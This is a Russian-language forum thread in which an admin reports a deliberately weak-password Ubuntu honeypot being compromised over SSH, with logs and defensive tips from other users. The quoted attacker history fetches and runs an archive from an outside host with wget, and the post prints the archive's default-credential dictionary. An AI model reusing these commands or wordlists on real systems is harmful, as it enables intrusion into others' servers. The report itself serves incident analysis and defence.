Отчет о том как я попал в ботнет. (краткий отчет)

[polovinamozga]

Давно хотел написать уже да все не доходили руки.
Давно уже наблюдаю весьма интересную картину на своих серверах
(под freebsd, solaris, ubuntu,opensuse и конечно же gentoo)
Постоянно идет брутофорс атака, при чем как выяснилось не на определенные сети, ну скажем не только на рашкинские адреса, но и
на финские и чешские, прозреваю что брутофорсят по всему миру.
А теперь перейду к непосредственно примерам.

Вчера на виртуальной машине убунтовой сменил рутовый пароль
на пароль "test" в надежде того что меня взломают и о чудо в 4.04
сегодня ночью неизвестный проник в систему

Код: Выделить всё

Feb 25 04:04:30 ubuntuserv sshd[26946]: Accepted password for root from 69.125.24.107 port 1199 ssh2
Feb 25 04:04:30 ubuntuserv sshd[26946]: pam_unix(sshd:session): session opened for user root by (uid=0)

Адрес принадлежит провайдеру из USA штат Texas дальше становится еще интереснее

Код: Выделить всё

    Feb 25 04:07:00 ubuntuserv passwd[27013]: pam_unix(passwd:chauthtok): password changed for irc

Новый рут сменил пароль на пользователя irc, пользователя такого у меня не было, логов заведения такого я не нашел, видать что-то таки затерли за собой.

Код: Выделить всё

Feb 25 04:07:15 ubuntuserv sshd[27015]: Accepted password for irc from 69.125.24.107 port 1210 ssh2
Feb 25 04:07:15 ubuntuserv sshd[27015]: pam_unix(sshd:session): session opened for user irc by (uid=0)

Следущим действием злоумышленника было заведение пользователя oracle
и такой же группы видимо для маскировки в системе в надежде, что администратор не станет сносить вроде как "системного" пользователя оракл

Код: Выделить всё

Feb 25 04:07:39 ubuntuserv useradd[27071]: new group: name=oracle, GID=1002
Feb 25 04:07:39 ubuntuserv useradd[27071]: new user: name=oracle, UID=0, GID=1002, home=/home/oracle, shell=/bin/sh

Но палево же!Зачем системному юзеру папка в /home ?

Дальше было еще более палевное действие

Код: Выделить всё

    Feb 25 04:51:58 ubuntuserv passwd[27155]: pam_unix(passwd:chauthtok): password changed for root

То бишь сменили пароль руту это самая главная ошибка злоумышленника,
сегодня в систему я пытался зайти именно под рутом, тут напрашиваются два вывода: либо кулхацкеры расчитывали на то что администратор будет работать от sudo, так как рутового пароль в бубунте какбе нет, либо они настолько тупые...


/var/log/messages

Код: Выделить всё

    Feb 25 04:08:37 ubuntuserv kernel: [369655.619943] device eth0 entered promiscuous mode
    Feb 25 04:40:46 ubuntuserv kernel: [371584.196912] device eth0 left promiscuous mode
    Feb 25 04:52:56 ubuntuserv kernel: [372314.970670] device eth0 entered promiscuous mode
    Feb 25 05:16:21 ubuntuserv kernel: [373719.422946] device eth0 left promiscuous mode

Сетевую карту перевели в промискус мод, для чего такая манипуляция
сказать не могу, так что велком обсуждение со своими предположениями.


А теперь выясним был ли это человек или просто скрипт
last root

Код: Выделить всё

    root     pts/0        ool-457d186b.dyn Thu Feb 25 04:52 - 06:56  (02:04)
    root     pts/0        ool-457d186b.dyn Thu Feb 25 04:51 - 04:52  (00:00)
    root     pts/0        ool-457d186b.dyn Thu Feb 25 04:04 - 04:40  (00:36)

Рут провел в системе 2 часа 40 минут, то есть явно это не скрипт.

Теперь повторюсь еще раз подобные брут-атаки я испытываю на всех своих серверах ежедневно, бывают перерывы по несколько дней но всегда продолжают долбить.

Средства борьбы с пионерами
утилита fail2ban(пакет есть во всех популярных дистрибутивах) после нного количества попыток входа банит айпи на нное время.
Ну и конечно же не ставить простые пароли.

Перепост из моего бложика, думаю будет интересно


UPD
Нашел аналогичную тему на лоре
Там злоумышленник так же проник в систему и на выходе получили точно такие же логи


UPD2

злоумышленник выкачивал вот этот файлик
wget http://mesarce.i-was-in-paris.com/osh.tgz

Код: Выделить всё

  125  wget http://mesarce.i-was-in-paris.com/osh.tgz
  126  tar zxvf osh.tgz
  127  cd osh
  128  chmod +x *
  129  ./go.sh 90
  130  w

Внутри архива есть файлик и вот его содержимое

Код: Выделить всё

root root
root password
root 111111
root 123456
root qwerty
root p@ssw0rd
root pa55w0rd
root passw0rd
root 1q2w3e
root abc123
root abcd1234
root 1234
root redhat
oracle oracle
test test

Я почти вышел на автора этого чуда, если удастся с ним связаться отпишу через пару дней.

[aim]

Сетевую карту перевели в промискус мод, для чего такая манипуляция
сказать не могу, так что велком обсуждение со своими предположениями.

это нужно чтобы слушать все сетевые пакеты пролетающие мимо сетевого интерфейса. используетя в анализаторах трафика типа wireshark и проч.

[drBatty]

Рут провел в системе 2 часа 40 минут, то есть явно это не скрипт.

все мои сетевые скрипты подделываются под человека, это по умолчанию умеет даже wget (регулируемая случайная задержка перед запросами).

Средства борьбы с пионерами
утилита fail2ban(пакет есть во всех популярных дистрибутивах) после нного количества попыток входа банит айпи на нное время.

...после энного количества попыток за небольшое время - именно от такого и спасают рандомные задержки. даже вредоносное ПО никуда не спешит - за время задержки никто не мешает атаковать другие сервера.

ИМХО это всё-же был скрипт, или (скорее) другое вредоносное ПО, например троян.

[watashiwa_daredeska]

Ну и конечно же не ставить простые пароли.

ssh на нестандартном порту снижает число подобных атак на порядки.

[polovinamozga]

Про нестандартные порты палка о двух концах.
Сейчас я например нахожусь в таком заведении где все порты закрыты кроме 22


aim

И про вайршарк знают и мониторинг всех пакетов я не понимаю что там хотели поймать.


drBatty

все мои сетевые скрипты подделываются под человека, это по умолчанию умеет даже wget (регулируемая случайная задержка перед запросами).

Немедленно прекратите меня брутить

[watashiwa_daredeska]

Сейчас я например нахожусь в таком заведении где все порты закрыты кроме 22

Ну, это отдельная песня. Помнится, я поднимал SSH на 443 порту, потому что прокся пускала только туда и на 80-й :)

[drBatty]

Сейчас я например нахожусь в таком заведении где все порты закрыты кроме 22

с какой целью так сделали? сами подставляете под удар все машины в заведении?!

И про вайршарк знают и мониторинг всех пакетов я не понимаю что там хотели поймать.

логи похоже порезаны нет-ли возможности их восстановить? например undelit-ом? мало вероятно, что вредитель воспользовался shred или chattr +s (как это делаю я). если логи чистились чем-то типа sed -i (vim, mcedit, etc), то восстановление возможно (обычно).

Немедленно прекратите меня брутить

это не я, это мои скрипты

[polovinamozga]

с какой целью так сделали? сами подставляете под удар все машины в заведении?!

Понятия не имею с какой целью но эта цель несколько затруднила мне выход в жаббер и асечку.

логи похоже порезаны sad.gif нет-ли возможности их восстановить? например undelit-ом? мало вероятно, что вредитель воспользовался shred или chattr +s (как это делаю я). если логи чистились чем-то типа sed -i (vim, mcedit, etc), то восстановление возможно (обычно).

После перевода карты в промискис мод пошла вот такая фигня

Код: Выделить всё

Feb 25 05:16:21 ubuntuserv kernel: [373719.952102] ssh-scan[27256]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:21 ubuntuserv kernel: [373719.952773] ssh-scan[27284]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:21 ubuntuserv kernel: [373719.961408] ssh-scan[27400]: segfault at 0 ip 08048e33 sp bfa16f50 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373719.963635] ssh-scan[27265]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373719.995584] ssh-scan[27306]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373719.997053] ssh-scan[27270]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373720.007373] ssh-scan[27301]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373720.038560] ssh-scan[27296]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373720.041044] ssh-scan[27364]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]
Feb 25 05:16:22 ubuntuserv kernel: [373720.041309] ssh-scan[27278]: segfault at 642d686f ip 080a3377 sp bfa16f20 error 4 in ssh-scan[8048000+c0000]

[polovinamozga]

Удалось восстановить часть логов.
Главный пост обновлен.

[neol]

А о чем тема вообще?

[polovinamozga]

В первых постах автор рассказывает о том как принимал наркотики и ставил линупс.

[drBatty]

В первых постах автор рассказывает о том как принимал наркотики и ставил линупс.

вы читать умеете? перечитайте.

[watashiwa_daredeska]

вы читать умеете? перечитайте.

:)
Чукча — не читатель, чукча — писатель. Читайте внимательней :)

[drBatty]

polovinamozga
а что будет, если там chkrootkit запустить?

[polovinamozga]

Запустил, руткитов никаких нет
Я выше писал что систему почистил от всего что там было левого.

[pingus]

Хм... Сейчас, видимо, без hand-made для пиара ботнета не обойтись. Моё ИМХО , и только

[polovinamozga]

А что такое "хенд-мейд для пиара ботнета" ?

[incognitus]

Сетевую карту перевели в промискус мод, для чего такая манипуляция
сказать не могу, так что велком обсуждение со своими предположениями.

Видимо кто-то надеется с зараженной машины проникнуть во внутреннюю локальную сеть (если есть) и для начала нахватать разных паролей побольше.

А вообще спасибо за исследование. Кстати, косвенно оно говорит о заметно выросшей доле Linux, настолько, что ботнетоводам уже стало интересно попробовать прорваться на линуксовые машины.

[sash-kan]

Кстати, косвенно оно говорит о заметно выросшей доле Linux, настолько, что ботнетоводам уже стало интересно попробовать прорваться на линуксовые машины.

непрестанное сканирование и настойчивые попытки залогиниться на 22-й порт помню с момента первого выхода в интернет с внешним ip-адресом (если память не изменяет, лет пять назад).

[yamah]

Топикстартер! А почему бы файерволом не запретить коннектится на 22-ой порт только с явно разрешенных адресов? Ну или хотя бы из подсети провайдера?

[watashiwa_daredeska]

А почему бы файерволом не запретить коннектится на 22-ой порт только с явно разрешенных адресов? Ну или хотя бы из аодсети провайдера?

Я этого не делаю, потому что:
1. Единственная машина в подсети моего провайдера, которую я вообще в глаза видел — моя.
2. Не люблю прыгать с бубном, если мне вдруг понадобится зайти на машину, скажем, через WiFi в каком-нибудь кафе.

[yamah]

А почему бы файерволом не запретить коннектится на 22-ой порт только с явно разрешенных адресов? Ну или хотя бы из аодсети провайдера?

Я этого не делаю, потому что:
1. Единственная машина в подсети моего провайдера, которую я вообще в глаза видел — моя.
2. Не люблю прыгать с бубном, если мне вдруг понадобится зайти на машину, скажем, через WiFi в каком-нибудь кафе.

По первому пункту. Я имел в виду подсеть провайдера, с которого будет происходить коннект.
По второму пункту. Мне, лично, значительно проще - у меня от силы пять компов с которых я могу коннектится к своим серверам.

[polovinamozga]

Топикстартер! А почему бы файерволом не запретить коннектится на 22-ой порт только с явно разрешенных адресов? Ну или хотя бы из подсети провайдера?

Не отовсюду есть возможность попасть на свою систему через нестандартный порт.
Да и смысла закрывать не вижу, так как этот сервер был специально подготовлен как ловушка.

Еще вот поделюсь наблюдением:
Большинство машин с которых брутят в основном на дистрибутивах на базе редхат, из случайной выборки
из 10 машин одна была на венде и еще 9 на всяческих центоса, федорах и редхатах.
Ынтыпрайз походу лососнул тунца.

[yamah]

Топикстартер! А почему бы файерволом не запретить коннектится на 22-ой порт только с явно разрешенных адресов? Ну или хотя бы из подсети провайдера?

Чейчас увидел, что не правильно сформулировал вопрос:
А почему бы файерволом не разрешить коннектится на 22-ой порт только с явно разрешенных адресов?

[awersa]

А можно проще поставить защиту от брута (где то нарыл на просторах инета - сам везде у себя поставил):

в /etc/rc.local

Код: Выделить всё

##SSH
/sbin/iptables -t filter -A INPUT -p tcp --destination-port 22 -m state --state NEW -m recent --set --name SSH -j ACCEPT
/sbin/iptables -t filter -A INPUT -p tcp --destination-port 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "SSH_BRUTFORCE: "
/sbin/iptables -t filter -A INPUT -p tcp --destination-port 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP

Не более 4 соединений в минуту - долго брутить будет Можно и 2 поставить .

После этого в логах имею :

Код: Выделить всё

Jul 18 10:27:01 QWERTY1 kernel: [382492.079411] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=104 TOS=0x00 PREC=0x00 TTL=56 ID=56743 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK PSH URGP=0
Jul 18 10:27:01 QWERTY1 kernel: [382492.079949] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=52 TOS=0x00 PREC=0x00 TTL=56 ID=56744 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK FIN URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.214339] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=52 TOS=0x00 PREC=0x00 TTL=56 ID=19366 DF PROTO=TCP SPT=44892 DPT=22 WINDOW=561 RES=0x00 ACK URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.214796] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=52 TOS=0x00 PREC=0x00 TTL=56 ID=34719 DF PROTO=TCP SPT=46253 DPT=22 WINDOW=365 RES=0x00 ACK URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.216220] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=52 TOS=0x00 PREC=0x00 TTL=56 ID=7775 DF PROTO=TCP SPT=46255 DPT=22 WINDOW=365 RES=0x00 ACK URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.448810] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=104 TOS=0x00 PREC=0x00 TTL=56 ID=56745 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK PSH URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.458768] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=64 TOS=0x00 PREC=0x00 TTL=56 ID=56746 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK URGP=0
Jul 18 10:27:02 QWERTY1 kernel: [382492.586149] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=52 TOS=0x00 PREC=0x00 TTL=56 ID=0 DF PROTO=TCP SPT=44892 DPT=22 WINDOW=561 RES=0x00 ACK URGP=0
Jul 18 10:27:03 QWERTY1 kernel: [382493.188423] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=104 TOS=0x00 PREC=0x00 TTL=56 ID=56747 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK PSH URGP=0
Jul 18 10:27:03 QWERTY1 kernel: [382493.218379] SSH_BRUTFORCE: IN=ppp0 OUT= MAC= SRC=97.107.139.127 DST=95.25.16.193 LEN=64 TOS=0x00 PREC=0x00 TTL=56 ID=56748 DF PROTO=TCP SPT=44903 DPT=22 WINDOW=561 RES=0x00 ACK URGP=0



Jul 21 19:25:34 QWERTY1 kernel: [673851.069772] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=54698 DF PROTO=TCP SPT=34660 DPT=110 WINDOW=5840 RES=0x00 ACK URGP=0
Jul 21 19:25:34 QWERTY1 kernel: [673851.215248] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:34 QWERTY1 kernel: [673851.241421] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:35 QWERTY1 kernel: [673852.673460] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:36 QWERTY1 kernel: [673853.287173] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34607 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:36 QWERTY1 kernel: [673853.287204] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34607 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:37 QWERTY1 kernel: [673854.491513] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34607 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:37 QWERTY1 kernel: [673854.877993] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=54699 DF PROTO=TCP SPT=34660 DPT=110 WINDOW=5840 RES=0x00 ACK URGP=0
Jul 21 19:25:38 QWERTY1 kernel: [673855.330277] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:39 QWERTY1 kernel: [673857.005870] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34607 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:43 QWERTY1 kernel: [673860.719232] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:44 QWERTY1 kernel: [673861.284320] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=54700 DF PROTO=TCP SPT=34660 DPT=110 WINDOW=5840 RES=0x00 ACK URGP=0
Jul 21 19:25:45 QWERTY1 kernel: [673862.027122] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34607 DPT=110 WINDOW=0 RES=0x00 RST URGP=0
Jul 21 19:25:54 QWERTY1 kernel: [673871.545711] pop3_BRUTFORCE: IN=eth0 OUT= MAC=00:16:76:2f:aa:5c:00:90:1a:42:45:06:08:00 SRC=200.49.12.68 DST=79.165.222.174 LEN=40 TOS=0x00 PREC=0x00 TTL=50
 ID=0 DF PROTO=TCP SPT=34441 DPT=110 WINDOW=0 RES=0x00 RST URGP=0

З.Ы. Машина с 4 интерфейсами - круглыми сутками долбяцца

[polovinamozga]

Да я не сильно заморачиваюсь.
Пароли все брутоустойчивые.
Пусть долбятся сколько влезет.
Сегодня кстати на одном из серверов замети что файл auth.log (кто не в теме логи авторизаций)
у меня за неделю достиг размера в 700 метров.
Ломятся с тысяч адресов просто.

[awersa]

Я заметил, что зарезав ICMP (пинги) - сразу же в логах авторизации на порядок уменьшаецца количество "дятлов"

[Ism]

Да я не сильно заморачиваюсь.
Пароли все брутоустойчивые.
Пусть долбятся сколько влезет.
Сегодня кстати на одном из серверов замети что файл auth.log (кто не в теме логи авторизаций)
у меня за неделю достиг размера в 700 метров.
Ломятся с тысяч адресов просто.

крепкие же у вас нервы

[drBatty]

Сегодня кстати на одном из серверов замети что файл auth.log (кто не в теме логи авторизаций)
у меня за неделю достиг размера в 700 метров.

дык - logrotate.
эти логи отлично жмутся - там одни и те-же строчки (особенно хорошо жмёт bzip2)

[polovinamozga]

Они и сжимались после этого.
И используется именно логротейт